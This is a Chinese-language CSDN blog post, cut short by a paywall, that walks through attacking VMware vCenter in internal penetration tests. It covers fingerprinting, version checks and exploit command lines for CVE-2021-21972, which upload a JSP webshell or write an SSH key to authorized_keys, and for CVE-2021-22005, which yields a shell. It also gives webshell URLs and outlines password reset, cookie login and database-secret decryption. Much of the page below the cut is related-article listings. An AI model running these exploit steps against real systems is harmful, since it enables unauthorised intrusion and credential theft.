Vcenter实战利用方式总结

已于 2023-10-24 10:58:34 修改
阅读量253 收藏
点赞数
分类专栏: 技术干货 文章标签: 1024程序员节 网络安全 web安全 python 开发语言
于 2023-10-24 10:37:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/134006474
版权
本文总结了内网渗透中针对Vmware Vcenter的实战打法,包括指纹特征识别、多个CVE漏洞利用(如CVE-2021-21972、CVE-2021-22005、CVE-2021-44228)以及获取vcenter-web控制台和虚拟机权限的方法,如重置密码、cookie登录、利用数据库解密等。
摘要由CSDN通过智能技术生成

目录

0x01 指纹特征

0x02 查看Vcenter版本

0x03 CVE-2021-21972

0x04 CVE-2021-22005

0x05 CVE-2021-44228

0x06 获取vcenter-web控制台权限

重置密码

cookie登录

不重置获取密码(ESXI)

1、获取解密key

2、获取数据库账号密码

3、使用脚本解密

4、登录ESXI

0x07 获取虚拟机权限

在内网渗透中常常会碰到VmwareVcenter,对实战打法以及碰到的坑点做了一些总结,部分内容参考了师傅们提供的宝贵经验,衷心感谢各位师傅

0x01 指纹特征

title="+ ID_VC_Welcome +"

image.png

0x02 查看Vcenter版本

/sdk/vimServiceVersions.xml

image-20220902150355359.png

0x03 CVE-2021-21972

影响范围

  • vCenter Server7.0 < 7.0.U1c
  • vCenter Server6.7 < 6.7.U3l
  • vCenter Server6.5 < 6.5.U3n
/ui/vropspluginui/rest/services/uploadova

访问上面的路径,如果404,则代表不存在漏洞,如果405 则可能存在漏洞

image-20220724170308995.png


windows机器:

漏洞利用: GitHub - horizon3ai/CVE-2021-21972: Proof of Concept Exploit for vCenter CVE-2021-21972

python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp

-t (目标地址)
-f (上传的文件)
-p (上传后的webshell路径,默认不用改)

image-20220724170308995.png


上传后的路径为

https://x.x.x.x/statsreport/gsl.jsp

完整路径为

C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport

image-20220813172742556.png


Linux机器:

1、写公私钥(需要22端口开放)

python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub

2、遍历写shell(时间较久)

GitHub - NS-Sp4ce/CVE-2021-21972: CVE-2021-21972 Exploit

image-20220829190235482.png

0x04 CVE-2021-22005

影响范围

  • vCenter Server 7.0 < 7.0 U2c build-18356314
  • vCenter Server 6.7 < 6.7 U3o build-18485166
  • Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
  • Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)
  • 6.7 vCenters Windows版本不受影响

漏洞利用

https://github.com/r0ckysec/CVE-2021-22005

cve-2021-22005_exp_win.exe -u https://x.x.x.x --shell

image-20220813184455354.png

https://github.com/rwincey/CVE-2021-22005/blob/main/CVE-2021-22005.py

python cve-2021-22005.py -t https://x.x.x.x

image-20220813190026044.png

连接webshell

https://x.x.x.x/idm/..;/test.jsp

image-20220813185938630.png

上传后的webshell完整路径为


                

        

        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  zkzq
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
C++开源界面库duilib的使用细节与实战技巧总结实战经验分享)

				
			

			

				

					dvlinker的技术专栏
				

				

					07-29
					
					1万+
					
				

			

		

		

			
				
本文详细分享C++开源界面库duilib的使用细节与实战技巧。

			
		

	



                

              
                



	

		

			

				
					
vCenter Server无法解密存储在自定义规范中的密码

				
			

			

				

					Arlo的博客
				

				

					12-02
					
					901
					
				

			

		

		

			
				
在使用虚拟机自定义规范克隆虚拟机的时候,出现错误:vCenter Server无法解密存储在自定义规范中的密码

网上查找了一些资料无用:
https://kb.vmware.com/s/article/51719?lang=zh_CN
解决办法:删除原有的自定义规范,重新创建一个新的即可解决。

...

			
		

	



                


  
              

                


	

		

			

				
					
记一次VMware vCenter渗透过程(主要是踩坑分享)

					
最新发布

				
			

			

				

					2401_83799022的博客
				

				

					06-26
					
					897
					
				

			

		

		

			
				
如果访问https ://ip :port,跳转到了某个域名链接,那么/SSO/后面跟的就是该域名。该工具,在VM安装目录下自带,就不用去别的地方下载了。选中VM图标,右键“打开文件位置”即可。因为机器都是生产相关的机器,不能使用克隆虚拟机等的骚操作,所以这里只介绍生成快照的方式。进到控制台后,如果发现域控机器,就可以使用生成快照,然后用工具分析快照文件抓hash。添加完后注意,不要直接刷新,而是访问https: //ip/ui,否则就会这样。环境问题可能会浪费很多时间,回头不行再看,这里换个脚本。

			
		

	





	

		

			

				
					
openstark-StarVCenter云平台软件

				
			

			

				

					故南思北的博客
				

				

					11-07
					
					870
					
				

			

		

		

			
				
2.配置IP地址(1)点击“Configure”按钮,选择“IPv4 Settings”,将“Method”设置为“Manual”。进入之前安装的StarVCenter管理界面,在“资源管理”>“扩充计算节点”菜单下依次执行“添加”、“配置网卡用途”、“一键部署”即可。继续点击“下一步”按钮,确认虚拟机配置,然后点击“开始创建”按钮,开始创建虚拟机。大约需要几秒钟完成创建,进入“虚拟机管理”>“虚拟机”菜单中能看到刚创建的虚拟机,点击右侧操作栏的“启动”按钮,启动虚拟机。

			
		

	



		

			
		



	

		

			

				
					
通过恢复GRUB来破解vCenter 6.0的ROOT密码无标题

				
			

			

				

					
				

				

					07-06
					
					1358
					
				

			

		

		

			
				
系统版本这就是登录界面,当然我们是不知道密码的,待会就要把这个密码给重置了,其实这种技术严谨来说不能称之为“破解”。因为它是属于Linux系统的内置机制,只能算Linux技术范畴之一。废话不多说,直接进入正题一、首先重启系统,在操作系统启动后,出现 GRUB 引导加载程序后,快速按一下方向键,让菜单停留在 GNU GRUB 菜单。键入 p, 输入 GRUB 密码。如下图。(一定要开机时候赶紧按,不然就会启动vcenter系统。就行Windows进bios一样,别错过机会)备注:(1)如果部署 VCSA 时,

			
		

	





	

		

			

				
					
StarVCenter从装机到使用全流程(避坑版)

				
			

			

				

					qq_51032922的博客
				

				

					04-16
					
					3067
					
				

			

		

		

			
				
网上的starVCenter文档都较为模糊,有的文档是采用的虚拟机进行安装,但是对于主机版安装的文档较为稀少,甚至是一文难求的地步,因此我结合自身从0部署的经验,总结出来一板避坑攻略,因为主机板安装的时候没有留存图片,因此,在安装环节,采用的都是网上虚拟机的图片,但是会在文字中进行详尽的描写。

			
		

	





	

		

			

				
					
Vmware vsphere6.7实战体验.docx

				
			

			

				

					11-26
				

			

		

		

			
				
### Vmware vSphere 6.7 实战体验:关键知识点解析  #### 一、Vmware vSphere 6.7 下载与版本选择  - **背景介绍**:虚拟化技术的发展使得服务器资源能够被更高效地利用。对于想要进行服务器虚拟化实践的用户来说,...

			
		

	





	

		

			

				
					
VMware View虚拟桌面创建实战.docx

				
			

			

				

					06-22
				

			

		

		

			
				
### VMware View 4.5 虚拟桌面创建实战知识点详解  #### 一、VMware View 4.5 概述及应用场景  ##### 1.1 VMware View 4.5 发布背景 - **发布时间**: 在2010年的VMworld大会上,VMware正式发布了新一代虚拟桌面产品...

			
		

	





	

		

			

				
					
vcenter综合利用总结

				
			

			

				

					网络安全。
				

				

					01-12
					
					1863
					
				

			

		

		

			
				
ESXi:安装在实体服务器上,其实是个linux内核的操作系统,官方的说法是有自己专利的一个内核,不属于以往任何现有的产品。只有安装了ESXi以后你才能在上面创建虚拟机。你可以理解成在你的台式机上装的vmware workstation,只不过ESXi不用运行在操作系统上(因为本身就是操作系统)而为虚拟机直接调用硬件资源。vCenter:就是个管理软件,用来管理虚拟机和实体机,比如通过vCenter监控虚拟运行情况、创建虚拟机、调整虚拟机资源、迁移虚拟机等等。

			
		

	





	

		

			

				
					
StarCenter双模式自主维护平台

				
			

			

				

					03-04
				

			

		

		

			
				
StarCenter是内置在PC中一套双模式的自主维护平台,它为计算机用户提供永久操作和沟通的运行环境。其强大的智能部署,环境保护,诊断修复及灾难恢复等功能,提高PC的可管理性和可维护性,帮助用户实现自主诊断和自主维修。

			
		

	





	

		

			

				
					
VMware.vSphere.vCenterServer.v5.1安装和破解注册机

				
			

			

				

					07-29
				

			

		

		

			
				
VMware.vSphere.vCenterServer.v5.1简要介绍,安装指导手册,完美破解注册机,历尽千辛万苦从网上搜寻到的,现和需要的同学共同分享!

			
		

	





	

		

			

				
					
starUML破解方法(Windows10 & MAC)

					
热门推荐

				
			

			

				

					飞鸟Blog
				

				

					07-19
					
					1万+
					
				

			

		

		

			
				
最近StarUML由2.0更新到3.0。原来的破解方法,修改license验证函数的方式不能用了。安装位置都变了,已经找不到LicenseManagerDomain.js这个文件了。那该怎么办?老司机告诉大家解决办法。

StarUML是用nodejs写的。确切的说是用Electron前端框架写的。新版本中所有的starUML源代码是通过asar工具打包而成。确切的代码位置在“%LOCALAPPD...

			
		

	





	

		

			

				
					
vCenter 漏洞利用总结

				
			

			

				

					越努力 越自由
				

				

					07-24
					
					3189
					
				

			

		

		

			
				
VMware vCenter是VMware公司推出的集中化虚拟化管理平台。它是VMware vSphere虚拟化解决方案的核心组件之一。vCenter的主要功能是管理和监控整个vSphere虚拟化基础架构,包括多个ESXi主机和虚拟机。vSpherevSphere是VMware的虚拟化平台的总称,它是一套完整的虚拟化解决方案,包括了多个组件和功能,用于构建和管理虚拟化环境。

			
		

	





	

		

			

				
					
干货分享 | VMware vCenter漏洞实战利用总结

				
			

			

				

					mingyqf的博客
				

				

					01-31
					
					2222
					
				

			

		

		

			
				
零队 [EchoSec](javascript:void(0)😉收录于合集#vmware1个文章来源:零队**前言**Vcenter一般指VMware vCenter Server,其提供了一个可伸缩、可扩展的平台,为虚拟化管理奠定了基础,可集中管理VMware vSphere环境,与其他管理平台相比,极大地提高了IT管理员对虚拟环境的控制,Vcenter可以使管理员从一个位置深入了解虚拟基础架构的集群、主机、虚拟机、存储、客户操作系统和其他关键组件等所有信息。利用思路。

			
		

	





	

		

			

				
					
记录一次安装StarVCenter

				
			

			

				

					发量堪忧
				

				

					04-10
					
					8994
					
				

			

		

		

			
				
简介
StarVCenter是新一代轻量级的IaaS软件,它能为你快速构建一个智能的中小型机房甚至大型数据中心,提供IT基础设施云服务能力。传统的计算、存储、网络资源将被抽象成极简化的管理模型,普通的机房管理员就可以轻松地搭建并管理云。
首先把镜像烧入U盘,然后安装在服务器上
安装步骤如下
















安装完成
安装第一台虚拟机
先上传系统到StarVCenter服务器里面


















第一台虚拟机部署完成,但是有没有看到网卡驱动没用,所以还要进行驱动安装





			
		

	





	

		

			

				
					
VMware vCenter Server 任意文件上传漏洞复现 CVE-2021-22005

				
			

			

				

					Ms08067安全实验室
				

				

					11-06
					
					6202
					
				

			

		

		

			
				
文章来源|MS08067 “WEB攻防”知识星球本文作者:Taoing(WEB高级漏洞挖掘班讲师)追踪最新漏洞 认准Web星球1、漏洞描述2、漏洞影响3、环境搭建4、漏洞复现5、修复方案...

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值